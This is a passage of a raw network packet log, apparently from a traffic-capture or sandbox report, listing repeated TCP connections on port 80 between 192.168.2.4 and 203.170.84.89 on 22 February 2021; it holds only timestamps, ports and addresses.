                                          Feb 22, 2021 19:14:17.047985077 CET8049825203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:17.048197985 CET4982580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:17.385940075 CET8049825203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:17.424968958 CET8049825203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:17.425321102 CET8049825203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:17.425364971 CET4982580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:17.425427914 CET4982580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:17.661257029 CET4982680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:17.762456894 CET8049825203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:17.999090910 CET8049826203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:17.999258995 CET4982680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:18.024683952 CET4982680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:18.362600088 CET8049826203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:18.362878084 CET4982680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:18.700308084 CET8049826203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:18.739638090 CET8049826203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:18.739775896 CET8049826203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:18.739877939 CET4982680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:18.739981890 CET4982680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:18.962858915 CET4982780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:19.079659939 CET8049826203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:19.302432060 CET8049827203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:19.302584887 CET4982780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:19.321867943 CET4982780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:19.659957886 CET8049827203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:19.660252094 CET4982780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:19.998182058 CET8049827203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:20.031702995 CET8049827203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:20.031749964 CET8049827203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:20.031930923 CET4982780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:20.031975985 CET4982780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:20.257460117 CET4982880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:20.371510983 CET8049827203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:20.595802069 CET8049828203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:20.596049070 CET4982880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:20.599287033 CET4982880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:20.937453032 CET8049828203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:20.937680960 CET4982880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:21.275712967 CET8049828203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:21.306483984 CET8049828203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:21.306590080 CET8049828203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:21.306638956 CET4982880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:21.306674957 CET4982880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:21.529941082 CET4982980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:21.644619942 CET8049828203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:21.877697945 CET8049829203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:21.877804995 CET4982980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:21.882520914 CET4982980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:22.227745056 CET8049829203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:22.227998972 CET4982980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:22.574868917 CET8049829203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:22.606409073 CET8049829203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:22.606697083 CET4982980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:22.606764078 CET8049829203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:22.606859922 CET4982980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:22.831449986 CET4983080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:22.951500893 CET8049829203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:23.168802977 CET8049830203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:23.169013977 CET4983080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:23.176364899 CET4983080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:23.514427900 CET8049830203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:23.515377998 CET4983080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:23.852638006 CET8049830203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:23.883021116 CET8049830203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:23.883290052 CET8049830203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:23.883521080 CET4983080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:23.883599043 CET4983080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:24.140039921 CET4983180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:24.220797062 CET8049830203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:24.478173018 CET8049831203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:24.478315115 CET4983180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:24.482439995 CET4983180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:24.820396900 CET8049831203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:24.822552919 CET4983180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:25.160581112 CET8049831203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:25.190963030 CET8049831203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:25.191011906 CET8049831203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:25.191106081 CET4983180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:25.191157103 CET4983180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:25.389622927 CET4983280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:25.526575089 CET8049831203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:25.725759029 CET8049832203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:25.728914022 CET4983280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:25.733887911 CET4983280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:26.068190098 CET8049832203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:26.068434000 CET4983280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:26.403249025 CET8049832203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:26.446412086 CET8049832203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:26.446681976 CET8049832203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:26.446708918 CET4983280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:26.446783066 CET4983280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:26.673378944 CET4983380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:26.782939911 CET8049832203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:27.008416891 CET8049833203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:27.008611917 CET4983380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:27.016300917 CET4983380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:27.351351976 CET8049833203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:27.351428986 CET4983380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:27.686309099 CET8049833203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:27.717015982 CET8049833203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:27.717096090 CET8049833203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:27.717150927 CET4983380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:27.719911098 CET4983380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:27.953135967 CET4983480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:28.052033901 CET8049833203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:28.290896893 CET8049834203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:28.291232109 CET4983480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:28.298521042 CET4983480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:28.636348009 CET8049834203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:28.636457920 CET4983480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:28.974087000 CET8049834203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:29.005323887 CET8049834203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:29.005374908 CET8049834203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:29.005482912 CET4983480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:29.005522013 CET4983480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:29.204662085 CET4983580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:29.345088959 CET8049834203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:29.539346933 CET8049835203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:29.539640903 CET4983580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:29.542202950 CET4983580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:29.876413107 CET8049835203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:29.876545906 CET4983580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:30.211976051 CET8049835203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:30.244988918 CET8049835203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:30.245059967 CET8049835203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:30.245168924 CET4983580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:30.245227098 CET4983580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:30.469335079 CET4983780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:30.579262972 CET8049835203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:30.807482958 CET8049837203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:30.807766914 CET4983780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:30.810538054 CET4983780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:31.145601988 CET8049837203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:31.145735979 CET4983780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:31.481028080 CET8049837203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:31.511131048 CET8049837203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:31.511451960 CET4983780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:31.511604071 CET8049837203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:31.514045000 CET4983780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:31.795514107 CET4983980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:31.846321106 CET8049837203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:32.132493973 CET8049839203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:32.132641077 CET4983980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:32.137482882 CET4983980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:32.474545002 CET8049839203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:32.474783897 CET4983980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:32.812048912 CET8049839203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:32.846445084 CET8049839203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:32.846576929 CET4983980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:32.846630096 CET8049839203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:32.846697092 CET4983980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:33.070969105 CET4984080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:33.184250116 CET8049839203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:33.409128904 CET8049840203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:33.409208059 CET4984080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:33.411950111 CET4984080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:33.748914957 CET8049840203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:33.749093056 CET4984080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:34.085664034 CET8049840203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:34.116691113 CET8049840203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:34.116771936 CET8049840203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:34.116975069 CET4984080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:34.117526054 CET4984080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:34.371501923 CET4984180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:34.453875065 CET8049840203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:34.716842890 CET8049841203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:34.717153072 CET4984180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:34.725025892 CET4984180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:35.073568106 CET8049841203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:35.073873043 CET4984180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:35.418869972 CET8049841203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:35.450486898 CET8049841203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:35.450736046 CET8049841203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:35.450814962 CET4984180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:35.450840950 CET4984180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:35.690229893 CET4984280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:35.795947075 CET8049841203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:36.025278091 CET8049842203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:36.025398970 CET4984280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:36.028479099 CET4984280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:36.364536047 CET8049842203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:36.364825964 CET4984280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:36.700278044 CET8049842203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:36.741519928 CET8049842203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:36.741547108 CET8049842203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:36.741727114 CET4984280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:36.741784096 CET4984280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:36.992747068 CET4984380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:37.078494072 CET8049842203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:37.326946020 CET8049843203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:37.327440977 CET4984380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:37.334441900 CET4984380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:37.668519020 CET8049843203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:37.668834925 CET4984380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:38.002674103 CET8049843203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:38.034826040 CET8049843203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:38.034876108 CET8049843203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:38.035116911 CET4984380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:38.035186052 CET4984380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:38.277103901 CET4984480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:38.370656013 CET8049843203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:38.615442038 CET8049844203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:38.615652084 CET4984480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:38.623261929 CET4984480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:38.960230112 CET8049844203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:38.961205006 CET4984480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:39.297967911 CET8049844203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:39.339082003 CET8049844203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:39.339129925 CET8049844203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:39.339318037 CET4984480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:39.339365959 CET4984480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:39.599857092 CET4984580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:39.676040888 CET8049844203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:39.945934057 CET8049845203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:39.946244001 CET4984580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:39.953346014 CET4984580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:40.298930883 CET8049845203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:40.299132109 CET4984580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:40.646445036 CET8049845203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:40.683614016 CET8049845203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:40.683698893 CET8049845203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:40.683887959 CET4984580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:40.683969021 CET4984580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:40.913114071 CET4984680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:41.029133081 CET8049845203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:41.249655962 CET8049846203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:41.249881983 CET4984680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:41.267887115 CET4984680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:41.603013039 CET8049846203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:41.603157043 CET4984680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:41.939703941 CET8049846203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:41.979253054 CET8049846203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:41.979475021 CET4984680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:41.979830027 CET8049846203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:41.979903936 CET4984680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:42.207290888 CET4984780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:42.315402985 CET8049846203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:42.541276932 CET8049847203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:42.541637897 CET4984780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:42.561340094 CET4984780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:42.895688057 CET8049847203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:42.895849943 CET4984780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:43.229955912 CET8049847203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:43.262561083 CET8049847203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:43.262681007 CET8049847203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:43.262912989 CET4984780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:43.263039112 CET4984780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:43.495717049 CET4984880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:43.596999884 CET8049847203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:43.831540108 CET8049848203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:43.831814051 CET4984880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:43.857917070 CET4984880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:44.196109056 CET8049848203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:44.196196079 CET4984880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:44.532948017 CET8049848203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:44.564707994 CET8049848203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:44.564831972 CET8049848203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:44.564836025 CET4984880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:44.564893961 CET4984880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:44.785031080 CET4984980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:44.900289059 CET8049848203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:45.130418062 CET8049849203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:45.130614996 CET4984980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:45.133831978 CET4984980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:45.479199886 CET8049849203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:45.479481936 CET4984980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:45.824578047 CET8049849203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:45.854491949 CET8049849203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:45.854528904 CET8049849203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:45.854818106 CET4984980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:45.854892015 CET4984980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:46.089612961 CET4985080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:46.202233076 CET8049849203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:46.434928894 CET8049850203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:46.435386896 CET4985080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:46.440406084 CET4985080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:46.785576105 CET8049850203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:46.785778046 CET4985080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:47.130799055 CET8049850203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:47.171031952 CET8049850203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:47.171273947 CET4985080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:47.171305895 CET8049850203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:47.171386003 CET4985080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:47.377475023 CET4985180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:47.516170025 CET8049850203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:47.726861000 CET8049851203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:47.727060080 CET4985180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:47.730696917 CET4985180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:48.079344988 CET8049851203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:48.079566956 CET4985180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:48.428066969 CET8049851203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:48.464941978 CET8049851203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:48.465244055 CET4985180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:48.465249062 CET8049851203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:48.465356112 CET4985180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:48.705482960 CET4985280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:48.815478086 CET8049851203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:49.043734074 CET8049852203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:49.043884039 CET4985280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:49.051549911 CET4985280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:49.389847994 CET8049852203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:49.390254974 CET4985280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:49.728283882 CET8049852203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:49.756752014 CET8049852203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:49.756836891 CET8049852203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:49.757126093 CET4985280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:49.757201910 CET4985280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:49.998437881 CET4985380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:50.095185041 CET8049852203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:50.333128929 CET8049853203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:50.333374977 CET4985380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:50.340811014 CET4985380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:50.675297976 CET8049853203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:50.675412893 CET4985380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:51.009763002 CET8049853203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:51.040293932 CET8049853203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:51.040643930 CET8049853203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:51.040776014 CET4985380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:51.040818930 CET4985380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:51.270282984 CET4985480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:51.376590014 CET8049853203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:51.615578890 CET8049854203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:51.615844011 CET4985480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:51.621969938 CET4985480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:51.967092991 CET8049854203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:51.967381954 CET4985480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:52.312628984 CET8049854203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:52.342394114 CET8049854203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:52.342526913 CET8049854203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:52.342597008 CET4985480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:52.342643023 CET4985480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:52.568804026 CET4985580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:52.688940048 CET8049854203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:52.903932095 CET8049855203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:52.904067993 CET4985580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:52.907812119 CET4985580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:53.243832111 CET8049855203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:53.244462967 CET4985580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:53.579478025 CET8049855203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:53.614855051 CET8049855203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:53.615014076 CET8049855203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:53.615245104 CET4985580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:53.615283966 CET4985580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:53.847465992 CET4985680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:53.951869011 CET8049855203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:54.192909956 CET8049856203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:54.193166971 CET4985680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:54.200424910 CET4985680192.168.2.4203.170.84.89
